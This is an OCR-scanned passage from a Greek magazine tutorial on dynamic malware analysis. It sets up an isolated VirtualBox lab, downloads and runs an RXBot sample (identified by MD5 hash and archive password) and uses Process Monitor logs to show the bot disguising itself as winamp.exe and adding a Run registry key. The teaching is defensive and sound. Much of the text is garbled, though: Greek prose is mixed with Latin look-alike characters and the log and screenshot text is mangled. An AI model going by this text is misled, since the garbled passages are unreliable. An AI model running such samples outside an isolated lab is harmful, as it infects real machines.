File and Folder Tasks (4) 
Œ] Rename this file 

Move this Fie 
Copy this file 


start 


AvdAuon malware, για όλους! Δυναμική προσέγγιση 
Αα 


μπορούμε να φτιάξουμε την «υπογραφή» του εκάστοτε malware, µε τη 
βοήθεια της οποίας θα ‘vai εὐκολη η μελλοντική ανίχνευση κι αντιμετό- 
πιση του uno εξέταση προγράµµατος. 


Τα véa µας σύνεργα 


Ὅπως εἰδατε, τα στοιχεία που εξετάζουμε κατὰ τη δυναμικἡ ανάλυση ci- 
ναι πάρα πολλά. Πα va καταγράψουμε ὁλα ra σχετικἁὰ δεδομένα και να 
παρακολουθήσουμε ενδελεχὼς τη δράση του κακὀβουλου προγράμμα- 
τος, θα χρειαστούμε τα κατάλληλα εργαλεία. Στο πρακτικὀ μέρος au- 
TOU του ἄρθρου θα χρειαστούμε και πάλι µια εικονικἠ μηχανὴ, την οποία 
πρέπει να στήσουμε σύμφωνα HE TIG οδηγἰες του προηγούμενου ἄρθρου. 
Σημειώστε OTI εμεἰὶς εργαζόµαστε µε ro VirtualBox, αλλά òga ακολουθούν 
θα μπορούσαν να πραγματοποιηθούν και σε οποιαδήποτε ἄλλη πλατφὀρ- 
μα virtualization. Στην εικονικἠ μηχανὴ εγκαθιστούµε τα Windows ΧΡ SP3 
και στη συνέχεια προσθέτουμε τα ακόλουθα εργαλεία. 


e Autoruns for Windows ν11.41 
http://technet.microsoft.com/en-us/sysinternals/bb963902.aspx 


e Process Hacker 2.30 
http://processhacker.sourceforge.net 

e Regshot 1.8.3-beta1V5 
http://sourceforge.net/projects/regshot 


3 Process Hacker [WINDOWS-MALWARE\Windows XP ΥΜ]- 
Hacker View Tools Users Help 


PID CPU l/OTotal. Private B... 
o 9950. ONT 


Application Layer Gateway Service 
LSA Shell (Export Version) 


File Edit View Favorites Tools Help 


Bex - ©- S sra Groves | E]- 


File and Folder Tasks 


CD Make a new Folder 
@ Publish this folder to the 
Web 


ζῶ Share this folder 


Εικόνα 5 
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e Process Monitor 3.03 
http://technet.microsoft.com/en-us/sysinternals/bb896645.aspx 


e Wireshark 1.8.4 
https://www.wireshark.org 


e FakeNet 1.0 
http://practicalmalwareanalysis.com/fakenet 


Προφανώς, το επὀµενο βήμα εἶναι να βρούμε Eva malware sample. Θα 
καταφύγουμε για ακόµα μία φορά στα γνωστά αποθετἠρια κακὀβουλου 
λογισμικού και θα χρησιμοποιήσουμε την πλατφόρμα Open Malware. 
Ανοίγουμε λοιπὀν τη σελἰδα OffensiveComputing.net κι αναζητάµε το 
rxbot (πληκτρολογούμε το ὀνομά του στη μπάρα πάνω αριστερά και na- 
Taye Search). Αμέσως θα µας επιστραφούν γύρω στα 20 αποτελέσµατα. 
Πα τις δικἐς µας δοκιμές επιλέξαμε να κατεβάσουμµε το τελευταίο της 
λίστας και yia va εἰμαστε ακριβεἰς, το αρχείο µε MD5 hash το ba670bd 
b28bf451021de04ddf5f192ca. Επιλέξαμε το RXBot επειδἠ πριν ano λίγα 
χρόνια ἦταν αρκετά γνωστὀ. To κατεβάζουμε λοιπὸν εντὸς της εικονικἠς 
μηχανἠς και το αποσυμπιέἐζουµε χρησιμοποιώντας TOV KWOIKO «infected». 
Προσοχἠ: Βρισκόμαστε πλέον σε point of no return! Στην επόµενη Evo- 
τητα θα εκτελἐέσουµε το κακόβουλο πρὀγραμμα και η εικονικἠ μηχανὴ θα 
μολυνθεί. Ακριβώς γι’ αυτό, πριν κάνουμε οτιδήποτε ἆλλο πρέπει *onoo- 
δήποτεξ να εκτελἐσουµε τις ακόλουθες δύο ενέργειες: 


1. Αλλάζουμε τις ρυθμίσεις δικτύου της εικονικἠς μηχανής, για λό- 
γους ασφαλείας φυσικἀ. AUTO το κάνουμε απὀ το κεντρικὀ Na- 
ράθυρο rou VirtualBox, ακολουθώντας τη διαδρομή: Settings > 
Network > Adapter 1. Στην επιλογἠ Attached to πρέπει να αλλά- 
ἔουμε τη ρύθμιση σε Host-only Adapter ἡ, ακὀµα καλύτερα, σε 
Internal Network. Με αυτόν τον τρὀπο η εικονικἠ μηχανὴ δε θα 
εἶναι σε θέση να επικοινωνήσει µε ro LAN ἡ ro Internet. 


2. Αφού τελειώσουμε µε την παραπάνω ρύθμιση, παἰρνουμε Eva 
snapshot ano την καθαρἠ (τουλάχιστον για την opa) EIKOVIKN un- 
xavn. Αυτό γίνεται ακολουθώντας τη διαδρομή Snapshots (μωβ 
κουμπάκι πάνω δεξιὰ) > Take Snapshot. Δίνουμε Eva περιγραφικὀ 
ὀνομα σαν το «Dynamic Malware Analysis Lab - clean» και προχω- 
ράμε στη ónyroupyia rou snapshot. 


Μπαΐνοντας στο παιχνίδι, αλλά δυναμικά! 


Ὅπως και µε την στατικἠ ανάλυση, ETO! και µε τη δυναμική έχουμε δύο 
επἰπεδα: Το βασικὀ και το προχωρημένο. Το δεύτερο περιλαμβάνει τη 
φόρτωση και την εκτέλεση του μεταγλωττισμένου αρχείου σε ἑναν 
debugger. AUTO το κομμάτι απαιτεἰ προχωρημένες γνώσεις για την ano- 
περἀτωσὴ rou kai δεν θα µας απασχολήσει. Θα ασχοληθούμε ὁμως Ka- 
νονικότατα µε το βασικὸ στάδιο, ano το οποίο θα πάρουμε απαντήσεις 
για όλα τα κρίσιμα ερωτήματα nou περιγράψαµμε νωρίτερα. Ας αρχίσουμε 
λοιπὸν να εξετάζουμε βήμα προς βήμα τη δράση του malware sample nou 
κατεβάσαμε. 


1» Βήμα: Έλεγχος των προγραμμάτων στην αυτόματη εκκίνηση 


Ως γνωστὸν, τα Windows διαθέτουν διάφορους μηχανισμούς για την αυ- 
τόµατη εκκἰνηση προγραμμάτων, κάθε φορά nou ξεκινά το λειτουργι- 
KÒ. Κι όπως θα φαντάζεστε, εἶναι απόλυτα φυσιολογικὀ ο δημιουργὸς 
ενὸς malware να θέλει να εντάξει το πρὀγραμμὰ του σε κάποιον and 
τους σχετικούς μηχανισμούς. Πα να ανακαλύψουμε αν συμβαίνει κάτι 


AvdAuon malware, για όλους! Δυναμική προσέγγιση 
Αα 


55. Process Monitor - Sysinternals: www.sysinternals.com 


File Edit Event Filter Tools Options Help 
EE... 


gmEIARERIvAGO!!!dS.immÓ 


PID Operation Path Result Detail 
1628 EA Quen pen C:\Documents and SettingsWwindows X... SUCCESS CreationT ime: 28/1.. 
1628 EA CreateFile. C:\Documents and Settings\windows X... SUCCESS Desired Access: E... 
SyncT ype: SyncTy.. 
AllocationSize: 2.4... 
SyncType: SyncTy.. 


Time... Process Name 

11:58... 14 Explorer. EXE 

E vg Explorer.EXE 
E 


ΠΠ Μα Process Monitor Filter 


Desired Access: R... 
Desired Access: R... 
Length: 12 


Remove 
‘column Relation Value Action 
o Process... is winamp.exe Include 
o Process. is Procmon.exe Exclude 
Q Process... is System Exclude 
[x] Operation begins with ΙΒΡ MJ. Exclude 
[x] Operation begins with FASTIO_ Exclude 
Result begins with FAST IO Exclude 


Desired Access: R... 
Type: REG_NONE.. 


o| 


Desired Access: R.... 
Desired Access: R... 
Length: 12 


[«] [S] [ST [5] [ST [€] 


Desired Access: R... 
Type: REG NONE.. 


{ ος 


IN Cancel | Apply 


=! Desired Access: R... 
Desired Access: A... 


11:58... Pilkas. 


564 Γη penKey HKLMSSECURITY\Policy\SecDesc 


SUCCESS 


τέτοιο και µε ποιὀν ακριβώς τρόπο επιτυγχάνεται, θα χρησιμοποιήσουμε 
το Autoruns. Εἶναι ἑνα npóypaupa που δημιούργησε αρχικά η γνωστή 
εταιρεία κατασκευἠς εργαλείων για Windows, ονόματι Wininternals. H 
Microsoft αγόρασε την εν λόγω εταιρεία το 2006 και ano τότε ra εργα- 
λεία της αποτελούν τη σουίτα Windows Sysinternals (παρεμπιπτόντως ο 
δημιουργός της Wininternals ἦταν εκεἰνος που ανακάλυψε το rootkit and 
Τη Sony, που αναφέραμε στο προηγούμενο ἀρθρο). To Autoruns τσεκάρει 
όλους τους μηχανισμούς αυτόματης εκκἰνησης, εξετάζει τους σχετικούς 
καταλόγους του συστήματος και φυσικἁ ελέγχει τις κατάλληλες περιοχὲς 
TOU registry. Έτσι, ὀταν τρἐχουµε TO πρὀγραµμµα εμφανίζονται *óAa* τα 
προγράμματα που ξεκινούν μαζἰ µε το σύστημα και μάλιστα µε τη σειρἆ 
εκτἐλεσής τους. Μια ιδιαίτερα χρήσιμη δυνατότητα που παρέχει ro npó- 
γραμμα εἶναι η αποθήκευση αυτής της λίστας σε αρχείο. Ένας αναλυτἠς 
malware μπορεὶ να αποθηκεύσει τη συγκεκριμένη λίστα μία φορὰ πριν 
ano την εκτέλεση rou κακόβουλου προγράμματος κι ἄλλη uia μετὰ απὀ 
την εκτέλεση. Ακολούθως, συγκρίνοντας τις δύο λίστες θα μπορεὶ va 
τσεκάρει αν προστέθηκαν προγράµµατα σε κἄποιον μηχανισμό αυτόμα- 
της εκκίνησης, σε ποια θέση του συστήματος αρχείων τοποθετήθηκαν, 
αν τροποποιήθηκε το registry και πάει λέγοντας. Ανοίγουμε λοιπὀν το 
εργαλεἰο και περιμένουμε να ολοκληρώσει τους ελἐγχους του. Μόλις TE- 
λειώσει επιλέγουμε TO Save ano το μενού File και αποθηκεύουμε ra ano- 
τελέσματα σε κἀποιο αρχείο. Αμέσως μετά (κι αφού πάρουμε µια βαθιά 
ανάσα) εκτελούμε ro malware sample! Μην περιμένετε να Seite τίποτα 
στην οθὀνη. Η λειτουργία του εἶναι, προφανώς, παρασκηνιακἠ. Εξάλλου, 
μετὰ απὀ Aiyo θα εξαφανιστεἰ και το ἴδιο το αρχείο που μόλις εκτελέἑσαµε. 
Βλέπετε, το να υπάρχει μπροστὰ στα μάτια µας το εκτελἑσιµο δεν εἶναι 
κάτι που θα ἠθελε ο δημιουργὸς του. Μη νομίζετε όμως ὁτι ἐχει προλάβει 
να κρυφτεἰ καλὰ μέσα στο σύστημα. Αλλά περισσότερα επ΄ αυτού θα 
πούμε στη συνέχεια. Προς το παρὀν, πάμε να δούμε αν εἶχαμε κάποια 
αλλαγή στους μηχανισμούς αυτόματης εκκἰνησης. Επιστρέφουµε eno- 
μένως στο avoikró παράθυρο rou Autoruns, ακολουθούμε τη διαδρομή 
File > Refresh κι αφήνουμε ro πρὀγραμμα να επαναλάβει τους ελέγχους 
TOU. Αν δεν εντοπίσουµε αμέσως τις αλλαγές, μπορούμε να επιλέξουμε 
το Compare ano το μενού File kai να δώσουμε στο πρὀγραμμα το αρχείο 


Εικόνα 6 
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που αποθηκεύσαµμε νωρίτερα. Το npòypappa θα συγκρίνει ra περιεχὀ- 
μενα του αρχείου µε την τρἐχουσα κατάσταση του συστήματος και θα 
επισημάνει ὀλες τις διαφορές µε πράσινο χρώμα. Μπορείτε να Seite ra 
αποτελέσµατα του δικού µας πειράματος στην εικὀνα 3. Προσέξτε όμως 
κάτι: Ta δικἀ σας αποτελέσµατα θα εἰναι κατά πάσα πιθανότητα διαφορε- 
τικά! Το συγκεκριµένο κακόβουλο πρόγραμμα δηµιουργεἰ κάθε φορά Eva 
αρχείο µε διαφορετικὀ ὀνομα. Στην πράξη, επιλέγει τυχαία κάποιο απὀ ra 
βασικἁ αρχεία του λειτουργικού συστήματος και δημιουργεί Eva αρχείο 
HE παρόμοιο ὀνομα. Στη δικἠ µας περίπτωση δημιούργησε το αρχείο µε 
ὀνομα spooisv.exe, ro onoio διαφέρει KATA Eva γράμμα ano το γνωστὸ 
αρχείο συστήµατος spoolsv. Με auró το κόλπο το κακόβουλο πρόγραµµα 
προσπαθεί να περνά απαρατήρητο ano τα μάτια του μέσου χρήστη -- για 
να µην πούμε και του προχωρηµένου! Επιπρὀσθετα, χρησιμοποιώντας 
κάθε φορά διαφορετικἀ ονόματα αρχείων, δυσκολεύει TOV εντοπισμὀ του. 


Σε αυτὀ το σημείο πρέπει να πραγματοποιούμµε την πρώτη µας επιστροφἠ 
στο καθαρὀ Snapshot που έχουμε κρατήσει απὸ την εικονικἠ μηχανή. 
Για τους χρήστες rou VirtualBox, υπάρχει ἑνας γρήγορος τρόπος για va 
τερματιστεί η εικονικἠ μηχανὴ και ταυτόχρονα va πραγµατοποιηθεἰ η pE- 
τἀβαση στο επιθυμητό snapshot: Πατάμε στο κουμπὶ κλεισίματος (X) του 
παραθύρου της μηχανής κι ano το μενού που εμφανίζεται επιλέγουμε 
την τρίτη επιλογή (power off the machine). Αμέσως μετὰ μαρκάρουμε 
TO «restore current snapshot blah» και πατάμε [Enter]. Προφανώς, στη 
θέση rou «blah» o καθένας θα δει το ὀνομα nou εἰχε δώσει κατὰ την 


5 Process Monitor - Sysinternals: www.sysinternals.com 
File Edit Event Filter Tools Options Help 


SHARE FAO 5 ἈΠ J/zZà:am 


PID Operation Result 


SUCCESS 


o 
5 
En 

\> 


476 B cetie, 


Windows XP VM \Desktop\ MALWARE 


Nwindows XP VM\Desktop\MALWARE \b... SUCCESS 


'ocuments and Settings\Windows XP VM\Desktop\MALWARE \b...SUCCESS: 
hG! \Docunente and Settings\Windows P 'VM\Desktop\MALWARE \b... SUCCESS 
Basktop\MALWARE\b...SUCCESS 


NAME NOT FOUND 


18/11/2007 8:24:36 

476 C:\Documents and Settings'Windows XP VM\Desktop\MALWARE \b...SUCCESS: Desired Access: Wiite Attributes, Synchr. 
476 ShSetBasicinform... C:\Documents and Settings Windows XP VM\Desktop\MALWWARE \b...SUCCESS CreationTime: 1/1/1601 2:00:00 πμ, Last 
476 Sh CloseFile C:\Documents and Settings\Windows XP VM\Desktop\MALWARE \b...SUCCESS: 

476 ShCreateFile C:\Documents and Settings\Windows XP VM \Desktop\MALWARE \b...SHARING VIOLAT... Desired Access: Generic Read/W'rite, Di. 
476 gh CreateFile C:\Documents and Settings windows XP VM\Desktop\MALWARE \b...SUCCESS Desired Access: Write Attributes, Synchr. 
476 2h. SetBasiclnfor... C:\Documents and Settings Windows XP VM\Desktop\MALWARE \b...SUCCESS CreationTime: 1/1/1601 2:00:00 ny, Last 
476 ShCloseFile C:\Documents and Settings\Windows XP VM\Desktop\MALWARE \b...SUCCESS. 

476 ShCreateFile C:\Documents and Settings\Windows XP VM\Desktop\MALWARE \b...SUCCESS. Desired Access: Generic Read, Dispositi. 
476 SA QueryAttibuteT ... C:\Documents and Settings\\windows XP VM\Desktop\MALWARE Vb... SUCCESS Attributes: A, ReparseTag: 0x0 E] 
476 Sh QueryStandardl... C:\Documents and Settings Windows XP VMNDesktop MALWARE Vb...SUCCESS. AllocationSize: 53.248, EndOfFile: 52.22. 
476 sk QueryBasicinfor...C:\Documents and Settings Windows XP VM\Desktop\MALWARE \b...SUCCESS CreationTime: 18/11/2007 8:24:36 μμ... 


τ :$DATÀ, 1: :Zone.ldentifie-$DATA 
CreationTime: 18/11/2007 8:24:36 yy, L. 
EaSize: 0 


C:AWINDOWS \system32\WINAMP.EXE NAME NOT FOUND 
C:AWINDOWS \system32\winamp.exe SUCCESS Desired Access: Generic Write, Read Att 
CAWINDOWS\system32 SUCCESS Desired Access: Synchronize, Dispositio.. 
CAWINDOWS\system32 SUCCESS 
-- CAWINDOWS \system32\winamp. exe SUCCESS FileSystemAttributes: Case Preserved, Ca 
INDOWS \system32\winamp.exe SUCCESS CreationTime: 28/1/2013 8:24:36 py, La. 
ΒΕΠΠΡΠΕΞΡΗΞΕΠΠΒΕ κο ktop\MALWARE \b... SUCCESS FileSystemAttributes: Case Preserved, Ca 
SUCCESS EndOfFile: 52.224 


.. CADocuments and Settings\Windows XP VM\Desktop\MALWARE \b...SUCCESS: 


SyncType: SyncTypeCreateSection, Pag 


botexe 476 S QueryStandardi... C:\Documents and Settings\Windows XP VM \Desktop\MALWARE \b...SUCCESS AllocationSize: 53.248, EndOfFile: 52.22. 
Elie ue Creare : DiDocamenis x Solna reus NP VM Dest NALS/ARE SUCCESS Sepe: Sire palin 
ot.ere riteFil : y: Winamp.exe. fset 0, Length: 52. 
bot.exe 476 Sh Queryátttibutel... C:\WINDOWS\system32\winamp.exe SUCCESS FileSystemáttibules: Case Preserved, Ca 
botexe 476 h Queryáttibutel... C:\Documents and Settings Windows XP VM \Desktop\MALWARE\b.,.SUCCESS FileSystemAttibutes: Case Preserved, Ca 
botere 476 Sh CreateFie  CADocuments and Settings\Windows XP VM \Desktop\MALWARE\b.,. SUCCESS Desired Access: Genetic Read, Dispositi 
bot.exe 476 SA QueryBasicinfor...C:\Documents and Settings\Windows XP VM\Desktop\MALWARE \b...SUCCESS CreationTime: 18/11/2007 8:24:36 μμ, L. 
botexe 476 EkCrealele  CAWINDOWS\system32\winamp.exe Zone. Identifier SUCCESS Desired Access: Generic Wiite, Disposili 
Fibot exe 476 Sh CreateFie  C:AWINDOWS\system32 SUCCESS Desired Access: Synchronize, Dispositio.. 
bot.exe CloseFile CAWINDOWS\cystema2 SUCCESS 
bot.exe 476 iekSetEndOfFielnl... CNWINDOWS \system32\winamp exe Zone Identifier SUCCESS EndüfFie: 26 
botere 476 C:\Documents and Settinas\Windaws ΧΡ YM\Desktop\MALWARE b... SUCCESS SyncType: SyncTypeCreateSection, Pag 
Fibotexe 476 'ocuments and Settings\Windows XP VM \Desktop\MALWARE\b.,.SUCCESS AllocationSize: 32, EndDfFile: 28, Numbe 
botexe 476 H 'ocuments and Settings Windows ΧΡ VM\Desktop\MALWARE b... SUCCESS SyncType: SyncTypeQlther 
x boLexe 476 =hWiteFile CAWINDDWSsystem32 Wwinamp.exe Zone. Identifier SUCCESS Offset: 0, Length: 26 
Εικόνα 7 Shot. exe 476 | due C:\Doouments and SeltingeSWindowis XP VM \Desktop\MALWARE b... SUCCESS 
5 ra Ebotere. 476 Ek SetBasiclnform... CAWINDOWS system32 Winamp. exe Zone Identifier SUCCESS CreationTime: 1/1/1601 2:00.00 ny. Last 
Σε αυτη την ΕΚΤΕ bot.exe 476 SA CloseFile CNWINDOWSNsystem32Wwinamp.exe:Zone Identifier SUCCESS 
λεση, ro malware botere 476 EkSelBasiclnform... C:\WINDOWS\system32\winamp.exe SUCCESS CreationTime: 1/1/1601 2:00:00 ny, Last 
d Fbotese. 476 Sh CloseFie C:\Documents and SettingstWindows XP VM\Desktop\ MALWARE V... SUCCESS 
sample kapou- botere 476 Ek CloseFile CAWINDDWS^system32 Winamp exe SUCCESS 
" boteze 476 Sh CreateFie  C:AWINDOWS\system32\winamp.exe SUCCESS Desired Access: Wille Altibules, Synchr. 
QA aperai ως TO botere 476 iS SelBasiclnform... CNWINDDWSNsystem32Winamp.exe SUCCESS CreationTime: 1/1/1601 2:00:00 ny, Last 
^ n Fbotexe 476 [ek CloseFie CAWINDOWS\system32\winamp. ere SUCCESS 
γνωστο προ γρ aypa bot. exe: 476 s CreateFile. CAWINDOWS\system32\winamp.exe SUCCESS Desired Access: Write Attributes, Synchr. 
] 4 botere 476 S SetBasiclnform... C:-\WINDOWS\system32\winamp.exe SUCCESS CreationTime: 1/1/1601 2:00:00 πμ, Last 
Wi namp. Quai Kd, 8243.. 7 Ἴμοιονο 476 ἘλΏρνοξίο CAWINDOWS\system32\winamp.exe SUCCESS a 
τίποτα δε ξεφεύγει € — = = == EE d 
anó TO Process Showing 2.432 of 40,266 events (6.95) Backed by virtual memory 
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αποθήκευση rou snapshot. Με αυτόν τον τρόπο, µέσα σε λίγο xpóvo και 
χωρὶς να κάνουμε τίποτε ἆλλο η μηχανὴ θα εἶναι ¿Toin για να την EKKI- 
νήσουμε πάλι. 


2° Βήμα: Επισκόπηση και καταγραφή κακόβουλων διεργασιών 


H οντότητα που ονομάζουμε διεργασία (process) απαρτίζεται ano το npó- 
γραμμα το οποίο εκτελείται και and ορισμένα ακόµα στοιχεία, ὁπως οι 
OXETIKEG τιμές που ¿xouv αποθηκευτεἰ στη μνήμη RAM. Όταν εκτελούμε 
ἑνα πρὀγραμμα, το λειτουργικὀ σύστημα δηµμιουργεἰ αυτόματα την avri- 
στοιχη διεργασία. Προσέξτε τώρα αυτὀ: Ένα πρὀγραµμµα μπορεἰ να σχε- 
τἰζεται µε παραπάνω ano μία διεργασία, ενώ µια διεργασία μπορεὶ va Ka- 
τασκευάζει πρὀσθετες διεργασίες που ονομάζονται υποδιεργασἰες (ἡ child 
processes). Ὅσοι ἐχετε ασχοληθεἰ αρκετἁ µε rov προγραμματισμὀ, εἶναι 
πολύ πιθανὀ να ἐχετε συναντήσει συναρτήσεις για τον ἐλεγχο διεργασι- 
ὦν ὁπως οι fork(),wait() κ.ά. Ας αφήσουμε ὁμως τη θεωρία στην ἄκρη κι 
ας εξετάσουμε ὁσα συμβαίνουν μέσα ano Eva παράδειγµα. Αυτή τη φορά 
θα χρησιμοποιήσουμε το εργαλείο Process Hacker. Μ΄ αυτό μπορούμε να 
παρακολουθούμε εὐκολα OAEG τις αλλαγές στις ενεργὲς διεργασίες του 
συστήματος, σε πραγματικὀ χρόνο. 


Ανοίγουμε το Process Hacker και το αφήνουμε να τρέξει για μερικἁ δευ- 
τερὀλεπτα. Στο παράθυρο του προγράµµατος θα εμφανιστεἰ (σχεδὀν) 
αμέσως uia λίστα µε τις διεργασίες του συστήματος. Όπως θα napa- 
τηρήσετε η εν λόγω λἰστα δεν εἶναι «επίπεδη» και το περιεχὀμενὀὸ της 


5 Process Monitor - Sysinternals: www.sysinternals.com 
File Edit Event Filter Tools Options Help 


Time... | Process Name PID| Operation Path Result Detail ^ 
winamp exe 1420 Bk ReadFie CAWINDOWS\cystem32\saenh dil SUCCESS Offset: 180.564, Length: 4.095 
exe 1420 Sh ReadFie CAWINDOWS \eystem32\rsaenh dil SUCCESS Offset: 184.660, Length: 4.095 
winamp.exe 1420 Ek ReadFie CAWINDOWS \cystem32\rsaenh dil SUCCESS 
Eve exe 1420 E ReadFie CAWINDOWS\cystema2\rsaenh dil SUCCESS 
winamp exe 1420 Ek ReadFie CAWINDOWS\cystem32\rsaenh dil SUCCESS 
. F'juinamp ese. 1420 [S RieadFie CAWINDDWSsystem32 saenh. dil SUCCESS Offset 201.072, Length: 4.095 
. F'uinamp ese. 1420 Sh ReadFie CAWINDDWSNsystem32 saenh, dil SUCCESS Offset 205.168, Length: 3.216 
o F'juinamp exe. 1420 Ek CloseFie CAWINDOWS\system2\rsaenh dil SUCCESS 
ae exe 1420 gERegüpenKep  HKLM\Software\Policies\Microsoft\ Cryptography NAME NOT FOUND Desired Access: Read, WOWE4_64K 
. lwinampexe 1420 iE RegSelVaiue —»- HKLM\SOFTWARE\Microsoft\Ciyptography\AING\Seed SUCCESS Type: REG, BINARY, Length: 80, Dal 
winamp exe 1420 SiRegSelValue  HKLM\SOFTWARE \Microsoft\Cryptograph RNG Seed SUCCESS Type: REG. BINARY, Length: 80, Dal 
0 ο 1420 SiRegSelValue  HKLM\SOFTWARE WMicrosoft\Ciyptograph \RING\Seed SUCCESS Type: REG. BINARY. Length: 80, Dal 
. =lwinamp.exe 1420 HiRegSelValue — HKLMNSDFTWAREMicrosofCiyptograph/RINB Seed SUCCESS Type: REG. BINARY, Length: 80, Dal 
. lwinamp.exe 142ῃ &RegSetVaiue ——- HKLM\SOFTWARE\Miorosoft\Ciyptography\NG\Seed SUCCESS Type: REG. BINARY, Length: 80, Dal 
: Eeee 1420 fRegSelVelue  HKLMSSOFTWARE WicrosoftiCiyptography\ANG\Seed SUCCESS Type: REG BINARY, Length: 80, Dal 
winamp exe. 1420 SiRegSelVaue  HKLMSSOFTWARE \MicrosoftCiyptograph RING Seed SUCCESS Type: REG BINARY, Length: 80, Dal 
. = jwinamp exe 1420 kRegOpenKey  HKLM\Software\Microsoft\Cryptography SUCCESS Desired Access: Read, WOW64_64K 
Flwinampexe 1420 SiRegQuenValue — HKLM\SOFTWARE\Microsoft\Ciyptography\MachineGuid SUCCESS Type: REG, SZ, Length: 74, Data: be 
Flwinamp.exe 1420 @&€ReoQueyValue ^ HKLM\SOFTWARE \Microsoft\Cryptography\MachineGuid SUCCESS Type: REG, SZ, Length: 74, Data: be 
E winamp.exe 1420 HiRegQuenValue  HKLM\SOFTWARE WMicrosoft\Ciyptography\MachineGuid SUCCESS Type: REG. SZ. Length: 74, Data: be 
. Éjuinamp.exe. 1420 SiRegüuenVale — HKLM\SOFTWARE Microsoft CiyptographyAMachineGuid SUCCESS Type: REG SZ, Length: 74, Data: be 
winamp exe 1420 SÉRegClosekey ^ — HKLM\SOFTWARE\Microsoft\Cryptoaraphy SUCCESS 
ΠΟ 1420 ΚξΓοοΏρεηέον — HKLMNSoftwareMMicrosof Cryptography Offload. NAME NOT FOUND Desired Access: Read 


. Ejwinamp.exe 1420 fRegCloseKey —— HKLM\SOFTWARE‘\Microsoft\Ciyptography\Defauks\Provider\Micro... SUCCESS 
i TAWINDOWS\system32 SUCCESS 


Desired Access: Execute/Traverse, 5. 


ft\Windows\CurrentVersion\Run Desired Access: All Access 
Type: REG. SZ. Length: 62, Data: C^ 
. amp ee setnoumrremrem. 1 y Gets EndOfFie: 16.384 
- Eduinamp exe SetEndOfFielnfom. SUCCESS EndOfFil: 20.480 
. F'inamp exe 1420 Sj SetEndOfFileInform...C:\WINDOWS\system32\confia\software.LOG SUCCESS EndOfFile: 24.576 Ξ 
- winamp exe 1420 Bh SetEndOfFilelnform...C:\WINDOWS\system32\confighsoftware.LOG SUCCESS EndOfFile: 28.672 
- = lwinamp exe 1420 SÉRegCloseKey  HKLMSSOFTWARE \Microsoft\Windows\CurrentVersion\Run SUCCESS 
winamp.exe 1420 SÉRegüpenKey ^ — HKLM \System\CurrentControlSet\Services\WinS ock2\Parameters — SUCCESS Desired Access: Maximum Allowed 
winamp exe 1420 SERegQuenValue — HKLM\System\CurtentContolSet\Services\winS ock2 Parameters... SUCCESS. Type: REG. SZ. Length: 8, Data: 20 
Em exe 1420 RegQuenVelue — HKLM\System\CurrentControlSet\Services\winS ock2 Parameters NW... SUCCESS. Type: REG. SZ, Length: 8, Data: 2.0 
winamp.exe 1420 BERegüpenKey HKLM \System\CurrentControlSet\Services\WinS ock2 Parameters Pr... SUCCESS. Desired Access: Maximum Allowed 
- Éuinamp exe 1420 ÉRegQuenValue — HKLM\System\CurrentControlSet\Seervices\WinS ock2\Parametets\Pr... SUCCESS. Type: REG_DWORD, Length: 4, Dal. 
E winamp.exe 1420 SERegüuenValue — HKLM\System\CurrentContiolSet\Services\WiinS ock2\Parameters\Pr... SUCCESS Type: REG DWORD, Length: 4, Dat. 
. winamp exe 1420 @RegOpenkey HKLM \Systern\CurrentControlSel\Services\WinS ock2\Parameters\Pr... NAME NOT FOUND Desired Access: Maximum Allowed 
Bee exe 1420 HiRegüuenValue — HKLM\Systern\CurrentControlSet\ Services\WinS ock2\Parameters\Pr... SUCCESS Type: REG_DWORD, Length: 4, Dat. 
. Slwinamp exe 1420 SEReoQuenVslue — HKLM\System\CurtentControlSet\Services\WwinS ock2\Parameters\Pr... SUCCESS Type: REG_DWORD, Length: 4, Dat. 
. = lwinamp exe 1420 WRegOpenkey HKLM \System\CurrentControlSet\Services\WinS ock2\Parameters\Pr... SUCCESS. Desired Access: Maximum Allowed 
ovinamp exe 1420 SiRegÜpenKey HKLM \System\CurrentControlSet\Services\winS ock2\Parameters\Pr...SUCCESS Desired Access: Read 
.. = lwinamp exe 1420 gtReoQuenVale — HKLM\System\CurrentControlSet\Services\winS ock2\Parameters\Pr... BUFFER DVERFL... Length: 144 
. = Jwinamp exe 1420 SERegQuenValue — HKLM\System\CurtentContiolSet\Services\WinS ock2\Parameters\Pr...BUFFER OVERFL... Length: 144 
: mum exe 1420 ERegQuenVelue — HKLM\System\CurrentControlSet\Services\WinS ock2\Parameters\Pr... SUCCESS. Type: REG. BINARY, Length: 888, D. 
winamp.exe 1420 ÉRegCloseKey HKLM \System\CurrentControlSet\Services\WinS ock2\Parameters\Pr... SUCCESS. 
1420 MERegÜpenkey  HKLM\System\CurrentControlSet Services \WinS ock2\Parameters\Pr... SUCCESS Desired Access: Read 
1420 SiRegQuenValue — HKLM\System\CurrentControlSet\Services\WinS ock2\Parameters\Pr...BUFFER OVERFL... Length: 144. 
1420 SReoQuenValue — HKLM\System\CurrentControlSet\Services\WinS ock2 Parameters Pr... BUFFER DVERFL.. Length: 144 
1420 BÉRegQuenValue — HKLM\System\CurrentControlSet\Services\WinS ock2\Parametets\Pr... SUCCESS Type: REG. BINARY, Length: 888, D. 
1420 SRegCloseKey HKLM Systern\CurrentControlSet\Services\WinS ock2\Parameters\Pr... SUCCESS 2 
Li | m 
Showing 858 of 40.266 events (2,%) | Backed by virtual memory. 
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To δήθεν winamp. 
exe πρόσθεσε τον 
εαυτὀ του στα 
προγράµµατα nou 
ξεκινούν αυτόµα- 
τα, τροποποιώ- 
vrac κατάλληλα 
TO registry του 
συστήµατος. 
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προβάλλεται µε µια ιεραρχηµένη δομή. Ἔτσι, εκτὸς απὀ τα ονόματα των 
διεργασιὼν βλέπουμε αμέσως ποιες διεργασίες δημιουργήθηκαν ano το 
σύστημα rj ano άλλες διεργασἰες και, αντίστοιχα, ποιες διεργασἰες EXOUV 
δημιουργήσει υποδιεργασἰες. Πα παράδειγµα, ὁπως βλέπετε και στη OXE- 
τικἠ εικόνα, TO explorer.exe ἐχει δημιουργήσει τις διεργασίες VBoxTray. 
exe, iexplore.exe, ProcessHacker.exe κ.λπ. Όλα αυτά εἰναι ωραία, αλλά 
δεν αποτελούν το λὀγο για τον οποίο ασχολούμαστε µετο συγκεκριµένο 
πρὀγραμμα. Αυτό που θέλουμε να δούμε εἶναι µε ποιόν τρόπο το malware 
κρύβει τη δικἠ του διεργασία απὀ τα μάτια του κόσμου. Με ro παράθυ- 
po rou Process Hacker ανοικτό, λοιπὸν, εκτελούμε το κακόβουλο npó- 
γραμμα. Αμέσως θα δούμε την εμφάνιση της διεργασίας bot.exe (rj όπως 
